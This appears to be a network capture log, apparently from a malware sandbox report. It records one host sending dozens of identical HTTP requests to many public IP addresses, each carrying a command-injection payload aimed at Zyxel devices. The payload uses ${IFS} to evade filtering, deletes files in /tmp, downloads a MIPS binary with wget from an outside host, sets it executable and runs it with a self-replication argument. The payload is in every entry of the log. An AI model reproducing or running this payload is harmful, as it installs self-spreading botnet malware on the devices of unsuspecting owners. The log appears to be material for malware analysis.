                                                Jan 28, 2024 10:16:39.019277096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7934192.168.2.234363614.72.153.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019290924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7935192.168.2.233565243.245.192.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019318104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7936192.168.2.2353118217.212.167.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019356012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7937192.168.2.235544031.40.193.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019356966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7938192.168.2.2347904146.147.105.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019383907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7939192.168.2.2334080180.74.42.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019393921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7940192.168.2.2342542118.231.187.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019426107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7941192.168.2.2339128129.167.30.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019464016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7942192.168.2.234320839.71.180.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019470930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7943192.168.2.2357392129.70.149.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019501925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7944192.168.2.2333336165.210.42.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019557953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7945192.168.2.234534246.80.248.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019563913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7946192.168.2.234999244.110.224.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019630909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7947192.168.2.2359036209.39.251.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019640923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7948192.168.2.2340478162.214.130.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019660950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7949192.168.2.2334292177.107.153.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019687891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7950192.168.2.234427490.49.216.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019699097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7951192.168.2.234516218.78.64.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019728899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7952192.168.2.2335826105.205.28.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019757986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7953192.168.2.2334758192.140.255.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019773960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7954192.168.2.2353496119.18.3.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019808054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7955192.168.2.233362496.146.71.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019838095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7956192.168.2.234465817.132.195.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019860029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7957192.168.2.233865274.172.133.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019897938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7958192.168.2.2338706148.130.48.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019925117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7959192.168.2.2357116125.173.188.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019953966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7960192.168.2.235029043.90.231.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020003080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7961192.168.2.2334296145.228.35.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020039082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7962192.168.2.234025287.0.193.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020059109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7963192.168.2.2359812193.237.178.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020075083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7964192.168.2.2341686171.198.243.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020123959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7965192.168.2.234075669.83.54.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020128012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7966192.168.2.234727888.254.41.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020160913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7967192.168.2.234795051.151.202.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020195007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7968192.168.2.234993673.196.132.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020196915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7969192.168.2.2338994197.116.147.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020226955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7970192.168.2.2334564186.134.53.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020239115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7971192.168.2.2350866220.54.115.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020293951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7972192.168.2.2355852142.42.152.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020303011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7973192.168.2.2334730131.114.237.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020335913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7974192.168.2.236097693.219.192.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020355940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7975192.168.2.2356926150.165.244.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020400047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7976192.168.2.234555838.124.41.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020421982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7977192.168.2.233575076.255.145.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020452976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7978192.168.2.235444683.17.120.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020503998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7979192.168.2.233561662.182.213.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020515919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7980192.168.2.2344884146.139.3.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020524025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7981192.168.2.235061479.187.193.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020555019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7982192.168.2.2346814209.125.188.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020605087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7983192.168.2.2352218188.159.244.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020629883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7984192.168.2.2359298118.243.249.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020673037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7985192.168.2.2347642206.52.135.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020693064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7986192.168.2.2352908139.35.20.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020720005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7987192.168.2.2342026145.91.154.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020739079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7988192.168.2.2340940115.61.111.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020761013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7989192.168.2.2336532115.195.151.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020807028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7990192.168.2.2348880115.253.200.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020827055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7991192.168.2.2351604165.3.242.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020853996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7992192.168.2.2351892195.83.82.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020881891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7993192.168.2.2357732169.185.50.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020889997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7994192.168.2.23501841.75.149.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.020900965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7995192.168.2.2334166122.143.52.98443
                                                TimestampBytes transferredDirectionData
